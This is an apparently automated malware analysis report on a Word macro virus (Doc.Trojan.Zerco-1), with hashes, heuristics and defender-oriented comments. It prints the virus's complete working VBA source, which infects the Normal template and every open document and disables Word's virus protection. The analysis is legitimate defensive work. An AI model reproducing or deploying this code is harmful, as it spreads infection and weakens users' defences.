Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 058d1cc4f2917b14…

MALICIOUS

Office (OLE)

31.0 KB Created: 2001-08-26 08:48:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: af9712284f8f03f059936013308904dd SHA-1: 22a7c65f81c3ef8a2511be01a124ebe3116461e2 SHA-256: 058d1cc4f2917b14ce8b84603df0ae42b0390223cff6ffcf3172d37f56c64577
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Zerco-1. It contains a legacy WordBasic AutoOpen macro and other VBA macros, indicating an attempt to execute arbitrary code upon opening. The AutoOpen macro appears to be designed to copy itself to the Normal template, potentially for persistence or to ensure execution on subsequent document openings. The extracted source below also shows a `Clone` routine that copies the same module into every open document, and a statement that sets `Options.VirusProtection = False`.

Heuristics 4

  • ClamAV: Doc.Trojan.Zerco-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Zerco-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of a legacy Word macro execution surface; by itself it is not an attribution to a downloader or to a parser CVE.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3554 bytes
SHA-256: 698bda84207d106fbfb8028251907bc3a2ba15d227695fab002440ae1535759a
Detection
ClamAV: Doc.Trojan.Zerco-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Exported attribute header of the document's own class module ("ThisDocument").
' The extract contains no procedures in this module, only the attributes above.

Attribute VB_Name = "CountZero"
' Second exported module, "CountZero". Every procedure that follows (AutoOpen,
' Clone, AutoNew) belongs to this module, and it is the module the code copies
' into other VBA projects by name.
' Word auto-execution entry point: runs when the document is opened (the
' heuristic findings above flag the AutoOpen name as a legacy auto-exec marker).
' Observed behaviour from the source: installs the "CountZero" module into the
' Normal template's VBA project if it is missing or differs, then calls Clone on
' every open document, saves each one, and turns off Word's VirusProtection option.
' Defender notes: the code touches the VBE object model (VBProject, VBComponents,
' CodeModule, References), which ordinary documents rarely need; a change to the
' Normal template's VBA project and Options.VirusProtection being set to False
' are the artefacts an analyst can look for on an affected host.
Sub AutoOpen()
Dim vbc As VBComponent
Dim cm As CodeModule
Dim vir As CodeModule
Dim cdoc As Document
Dim vbiref As Reference
' All errors are swallowed from here on; the Err checks below rely on this.
On Error Resume Next
' Only act when the running document is not the Normal template itself.
If ThisDocument.Name <> NormalTemplate.Name Then
    ' Probe for an existing "CountZero" module in Normal; a failed lookup sets Err.
    Set vbc = NormalTemplate.VBProject.VBComponents("CountZero")
    If Err <> 0 Then
        ' Module absent: find this document's "VBIDE" reference so it can be
        ' re-added to Normal's project after the module is copied.
        For Each vbiref In ThisDocument.VBProject.References
        If vbiref.Name = "VBIDE" Then
            Exit For
        End If
        Next
        Set vbc = NormalTemplate.VBProject.VBComponents.Add(vbext_ct_StdModule)
        vbc.Name = "CountZero"
        Set cm = vbc.CodeModule
        ' Copy this document's own CountZero source, line for line, into Normal.
        Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
        cm.InsertLines 1, vir.Lines(1, vir.CountOfLines)
        NormalTemplate.VBProject.References.AddFromGuid vbiref.GUID, vbiref.Major, vbiref.Minor
    Else
        ' Module present: compare Normal's copy with this document's copy.
        Set cm = vbc.CodeModule
        Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
        If cm.Lines(1, cm.CountOfLines) <> vir.Lines(1, vir.CountOfLines) Then
            ' Differs: same add/rename/copy sequence as the absent case.
            ' NOTE(review): a module named "CountZero" already exists here and
            ' errors are suppressed, so whether the old copy is actually replaced
            ' cannot be told from the source alone.
            For Each vbiref In ThisDocument.VBProject.References
                If vbiref.Name = "VBIDE" Then
                    Exit For
                End If
            Next
            Set vbc = NormalTemplate.VBProject.VBComponents.Add(vbext_ct_StdModule)
            vbc.Name = "CountZero"
            Set cm = vbc.CodeModule
            Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
            cm.InsertLines 1, vir.Lines(1, vir.CountOfLines)
            NormalTemplate.VBProject.References.AddFromGuid vbiref.GUID, vbiref.Major, vbiref.Minor
        End If
    End If
End If
' Propagate the module into every currently open document and save each one,
' so the change is written to disk.
For Each cdoc In Documents
    Clone cdoc
    cdoc.Save
Next

' Disables Word's macro virus protection setting.
Options.VirusProtection = False
Application.Activate
' Restore default error handling before returning.
On Error GoTo 0
End Sub
' Copies this document's "CountZero" module into the VBA project of dest.
' dest: the target Document. Mirrors the Normal-template logic in AutoOpen:
' add the module if it is missing, or re-add it if its source differs from
' this document's copy, then add the "VBIDE" reference found in this project.
' Errors are suppressed for the whole procedure, so a target that rejects
' VBProject access simply leaves no trace in the macro's own control flow.
Sub Clone(ByRef dest As Document)
Dim vbiref As Reference
Dim vbc As VBComponent
Dim cm As CodeModule
Dim vir As CodeModule
On Error Resume Next
' Locate this document's "VBIDE" reference for later re-use on dest.
For Each vbiref In ThisDocument.VBProject.References
    If vbiref.Name = "VBIDE" Then
        Exit For
    End If
Next
' Probe for an existing "CountZero" module in dest; a failed lookup sets Err.
Set vbc = dest.VBProject.VBComponents("CountZero")
If Err <> 0 Then
    ' Absent: add a standard module, name it, and copy this module's lines into it.
    Set vbc = dest.VBProject.VBComponents.Add(vbext_ct_StdModule)
    vbc.Name = "CountZero"
    Set cm = vbc.CodeModule
    Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
    cm.InsertLines 1, vir.Lines(1, vir.CountOfLines)
    dest.VBProject.References.AddFromGuid vbiref.GUID, vbiref.Major, vbiref.Minor
Else
    ' Present: only re-copy when the source text differs from this document's copy.
    Set cm = vbc.CodeModule
    Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
    If cm.Lines(1, cm.CountOfLines) <> vir.Lines(1, vir.CountOfLines) Then
        ' NOTE(review): as in AutoOpen, a module with this name already exists
        ' and errors are hidden, so the outcome of Add/.Name here is not
        ' determinable from the source.
        Set vbc = dest.VBProject.VBComponents.Add(vbext_ct_StdModule)
        vbc.Name = "CountZero"
        Set cm = vbc.CodeModule
        Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
        cm.InsertLines 1, vir.Lines(1, vir.CountOfLines)
        dest.VBProject.References.AddFromGuid vbiref.GUID, vbiref.Major, vbiref.Minor
    End If
End If
End Sub
' Second auto-execution entry point, named for Word's new-document event.
' Runs only when the executing document is the Normal template (i.e. after
' AutoOpen has already installed the module there) and calls Clone on every
' open document. Unlike AutoOpen it does not save the documents or change
' Options, and it has no error handler of its own.
Sub AutoNew()
Dim adoc As Document
    If ThisDocument.Name = NormalTemplate.Name Then
        For Each adoc In Documents
            Clone adoc
        Next
        Application.Activate
    End If
End Sub